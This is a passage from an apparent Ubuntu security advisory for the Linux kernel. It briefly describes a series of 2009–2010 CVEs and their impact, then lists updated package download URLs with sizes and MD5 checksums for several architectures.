memory\nprotection of the Virtual Dynamic Shared Object page when running\na 32-bit application on a 64-bit kernel. (Only affected Ubuntu 6.06\nLTS.) (CVE-2009-4271)\n\nIt was discovered that the r8169 network driver did not correctly check\nthe size of Ethernet frames.  A remote attacker could send specially\ncrafted traffic to crash the system, leading to a denial of service. \n(CVE-2009-4537)\n\nWei Yongjun discovered that SCTP did not correctly validate certain\nchunks.  A remote attacker could send specially crafted traffic to\nmonopolize CPU resources, leading to a denial of service. (Only affected\nUbuntu 6.06 LTS.) (CVE-2010-0008)\n\nIt was discovered that KVM did not correctly limit certain privileged\nIO accesses on x86.  Processes in the guest OS with access to IO regions\ncould gain further privileges within the guest OS. (Did not affect Ubuntu\n6.06 LTS.) (CVE-2010-0298, CVE-2010-0306, CVE-2010-0419)\n\nEvgeniy Polyakov discovered that IPv6 did not correctly handle\ncertain TUN packets. (Only affected Ubuntu 8.04\nLTS.) (CVE-2010-0437)\n\nSachin Prabhu discovered that GFS2 did not correctly handle certain locks. \nA local attacker with write access to a GFS2 filesystem could exploit\nthis to crash the system, leading to a denial of service. (CVE-2010-0727)\n\nJamie Strandboge discovered that network virtio in KVM did not correctly\nhandle certain high-traffic conditions.  A remote attacker could exploit\nthis by sending specially crafted traffic to a guest OS, causing the\nguest to crash, leading to a denial of service. (Only affected Ubuntu\n8.04 LTS.) (CVE-2010-0741)\n\nMarcus Meissner discovered that the USB subsystem did not correctly handle\ncertain error conditions.  A local attacker with access to a USB device\ncould exploit this to read recently used kernel memory, leading to a\nloss of privacy and potentially root privilege escalation. (CVE-2010-1083)\n\nNeil Brown discovered that the Bluetooth subsystem did not correctly\nhandle large amounts of traffic.  A physically proximate remote attacker\ncould exploit this by sending specially crafted traffic that would consume\nall available system memory, leading to a denial of service. (Ubuntu\n6.06 LTS and 10.04 LTS were not affected.) (CVE-2010-1084)\n\nJody Bruchon discovered that the sound driver for the AMD780V did not\ncorrectly handle certain conditions.  A local attacker with access to\nthis hardward could exploit the flaw to cause a system crash, leading\nto a denial of service. (CVE-2010-1085)\n\nAng Way Chuang discovered that the DVB driver did not correctly handle\ncertain MPEG2-TS frames.  An attacker could exploit this by delivering\nspecially crafted frames to monopolize CPU resources, leading to a denial\nof service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1086)\n\nTrond Myklebust discovered that NFS did not correctly handle truncation\nunder certain conditions.  A local attacker with write access to an NFS\nshare could exploit this to crash the system, leading to a denial of\nservice. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1087)\n\nAl Viro discovered that automount of NFS did not correctly handle symlinks\nunder certain conditions.  A local attacker could exploit this to crash\nthe system, leading to a denial of service. (Ubuntu 6.06 LTS and Ubuntu\n10.04 LTS were not affected.) (CVE-2010-1088)\n\nMatt McCutchen discovered that ReiserFS did not correctly protect xattr\nfiles in the .reiserfs_priv directory. (CVE-2010-1146)\n\nEugene Teo discovered that CIFS did not correctly validate arguments when\ncreating new files.  A local attacker could exploit this to crash the\nsystem, leading to a denial of service, or possibly gain root privileges\nif mmap_min_addr was not set. (CVE-2010-1148)\n\nCatalin Marinas and Tetsuo Handa discovered that the TTY layer did not\ncorrectly release process IDs.  A local attacker could exploit this to\nconsume kernel resources, leading to a denial of service. (CVE-2010-1162)\n\nNeil Horman discovered that TIPC did not correctly check its internal\nstate.  A local attacker could send specially crafted packets via AF_TIPC\nthat would cause the system to crash, leading to a denial of service. \n(Ubuntu 6.06 LTS was not affected.) (CVE-2010-1187)\n\nMasayuki Nakagawa discovered that IPv6 did not correctly handle\ncertain settings when listening.  If a socket were listening with the\nIPV6_RECVPKTINFO flag, a remote attacker could send specially crafted\ntraffic that would cause the system to crash, leading to a denial of\nservice. (Only Ubuntu 6.06 LTS was affected.) (CVE-2010-1188)\n\nOleg Nesterov discovered that the Out-Of-Memory handler did not correctly\nhandle certain arrangements of processes.  A local attacker could exploit\nthis to crash the system, leading to a denial of service. (CVE-2010-1488)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.diff.gz\n      Size/MD5:  2960435 33b09ecaf8a52ac8518c34163d53c5ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc\n      Size/MD5:     2439 ddd8f898074d4b56e18fa00cecaed4d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.84_all.deb\n      Size/MD5:  5166142 6bb2a7cc886f5f258e598f8257386c4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.84_all.deb\n      Size/MD5:    96900 4d56e3ffc13abbd559252d961582928e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84_all.deb\n      Size/MD5: 44742758 a29467cb2571e45b5ba4cc52f49d402e\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    22344 22df0e2142b58bfc5089997ba68f8a32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    44772 e38fce9b303eb280f9de5b6bf4321539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     2312 519dde14b25bcb6f72b50b10fb2b8c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    36298 529530b75bc9d308a36945e253829337\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   102370 db98ff5f9e6e356af90422da4190fcba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    38890 0d2cb99466cf014ba83ad3a38cd759f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    49144 7e51d739d81751a717fd33393d9b5698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   176620 61c26ebee2f9b56ab2ae781caaa78f16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    36774 32797f4fc4204eeb5185a17019dc5cd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   142346 50314cb83693e27a2f515836bfb81adf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    51062 c7f26b13e057743d95d90c6ed1feb7be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   140712 60824c117e8e10faa8502405dc64b756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   287612 e599c71e4f9f791bfcbb5a8e148fa02d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    97832 923d2dbedfa2bb0ce20db2af510ec3ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1652310 a49bd3692b26b2776eddd3218049ad31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb\n      Size/MD5:   869218 c54b14fff14e6f36a6f5424bf28ba5ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb\n      Size/MD5:   868510 e7741f1995f864eea030c242abac8085\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb\n      Size/MD5:   871276 ad7e3f9695e48c13d78024d9cebb4bdc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb\n      Size/MD5:   870704 c3dd9b5335fa41ab82df7f691cee2a46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_amd64.deb\n      Size/MD5:  6925588 e85a966dd3fd31a092a504e4c4383820\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb\n      Size/MD5: 20817472 f8e7d44b2a3bd9dc72917fd16c2628ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb\n      Size/MD5: 20798306 fe88a926a6ce4b4465ad88a493a48357\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb\n      Size/MD5: 21635330 8174ddfff1140d94b76678739c9f15c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb\n      Size/MD5: 19905746 58501fc8aca4794202804578b4e29415\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    15626 94656d1862678ee9b6a3a62f90919629\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   240372 faf0cd25cfd49759685f8a9b725e305d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   202684 fec1b04e98e48c0e354e9a47cb00d601\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1048610 a5ff74bb5b40c0b6929d535abade30be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1543792 217e245037c3d6c48687b594c932025b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   161696 969b188d1e7f285fc30f39e17ebd349b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     9834 c6278cf04b4dbb788d0eebaf599c005e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    80872 2fb47b12ddf5767a51bdc1d4e1f05e52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    49294 f27115bb56ba683c95c915de40a46afc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    35162 4e92b8742d5ad65bf0d915d9c216c4ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    70894 c7525221ee4847b254c1839cdd4d0b31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     6220 8d1ee1256a6d3942c10dd7731bd34d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:     9062 f120989e7b729addea0a373b6c6b81a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    57922 16f0dd4d6e989ec1684074667b9c1133\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   123378 b2797adf33289dd9c99525971a8d001b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   101080 0b923143d4fb260149446550b64529d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    79278 950ccff4d598e5f9c62d4ffcea1b4b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:  1595422 5d2e9b2d898d39363c3cab3c67391c0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    72356 2fdf60644e4d13a5c9732d48e3b6b025\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    12648 7a5b7c88d879c5f8611add807b77dff5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    33808 f48b8b878206b3f559826c9177935c7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   138510 27d844c2fc790a35b13b9b68c0748ec0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:    38938 c50f0d87787aacbb068bd4bfac99a953\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb\n      Size/MD5:   278876 09d4db859ee11c8c17a5c755a38e103c\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    18976 1d3b491a97a3cafd02b9492bbf7f320c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    43488 3592e8676adb913653d31fd7d9254ab6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   105206 87f8b212932688293624f3c1e59c315e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     2286 a8cbb01c110d4788b8464a3ff357a6d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    34576 0d581950d36489a0ebc2e7aa43871105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    97044 3e789df7024c53456caf5ce65a095c3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    37132 fb21ce86da4297933bdd3acaeb02568a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    44126 a0e10d7f107c376bd0376cbeb7589d12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   167738 d6417b63d8c5511f21bc7857b1e6ef23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    33950 d833056cd1d32851c93cc61d3780b258\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   137978 3c251b1f57940da0f22e496ab4d9f6d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    46902 a916219f56dc797576f7cdf42535fe44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   133154 fdfe5b2d21ec36137e19d638cec2a39d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   273800 05e8313fec49c11084adb52deb26878d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   102328 ce88505cda9ff607c7bb685c60a4fb75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1597794 7a8768bb650b30137362b93c9aa2e4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.84_i386.deb\n      Size/MD5:   857150 2de1fda09c98f8c7c0f5bb5adaf4dade\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb\n      Size/MD5:   858572 83f459c63da9ce886855913a4012edf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.84_i386.deb\n      Size/MD5:   859816 5fb638b3b741914410eb7fb331dc352e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb\n      Size/MD5:   861156 732a23b93ee499deda765ee8dcd66346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.84_i386.deb\n      Size/MD5:   860324 57519a85aad5ad19b617c4676f28d7f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_i386.deb\n      Size/MD5:  6918250 084d1cf58595b1cbadcbd7f16dc39756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.84_i386.deb\n      Size/MD5: 21724888 f5fca5f423472946432ed46a990c1ddf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.84_i386.deb\n      Size/MD5: 22517998 6ef9d114c0f9989e9e5a0a6d4af64cd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.84_i386.deb\n      Size/MD5: 22265884 1ee20e38ac15055088248b99fe684e43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb\n      Size/MD5: 23627106 b63abff51aa83dc377d5eb9235972302\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.84_i386.deb\n      Size/MD5: 23179652 98de15fe41e4afa4100f6105b8003f8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    15510 9190bfcba4e54f10b48d3419f7c3d368\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   238512 1ab04364f536a96b5c2a127765f496da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   197142 3f27653e150b8dba0ee8b187d8826f5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1048396 03a161c4b52eb41c6d401133cd32557b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1741516 b42acfc4c67ddc9f0ee62bca1b54974e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   160898 fb7d22beea89de5012d2216d0eda3a6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     9166 38112f1195a5bb82137e1896994656fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    76470 c9b373c18450b29f9de3b1679249d31e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    53548 6b3491987d4f627c910d1823727dac53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    33052 ddfeb1282d026c9b32978a5e04f1d3bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    85628 cf78a570b17bd819e61dc92f8a12355b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     6016 3e488082205ca42452081010da71004a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     8760 350a58a2f466e3f592b2c7bd2e8988bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    53636 3684ebb027993d843a17bf4c72b02b65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   130960 de27399a7d9abfb5f51abaeecc76ae6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    98472 5a5a0a34b4f405bcf0936087cf616586\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    77214 fb39917bbdb208d34fe6a74f0e83d53a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1768884 6cb328e8edc6b0a0fd27f2a90042c30a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    69614 2d2f95e1dba3de3dd1d963fb1f953e00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    11766 26e704eca4b49d3428687a2529990418\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    36106 522f5775e1a85646cc4d646f6eec6cc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   132660 97ac208287c24264bc384b1e1f253ab7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    38574 d825ca1fbb12c5a8cd2d15b094726011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   299152 345d6c44429a0a6af9d23179fb78ec8d\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    23728 02cb39b583ee98c8d1a57ce3e5b163c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    26006 87d2de748a7344d11fb11f8264571dd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    49334 0847429f9dedb0f286d1c32cb3e8f467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    51536 9ec5c9b175a6728442ddf73aa218592f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2306 b23053a32da0479242caeff6e2ae8b6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2482 05329a184127afb2a7e48d427feafbf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40308 cd883cbcca861116d2518f57f47dc941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    43844 a1c3942c443e444816749c64439275e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   112600 098304fe251f9d8c49849946d8ac2aeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   120740 df40f802ec2ee163a813ea0a3603aeb6\n    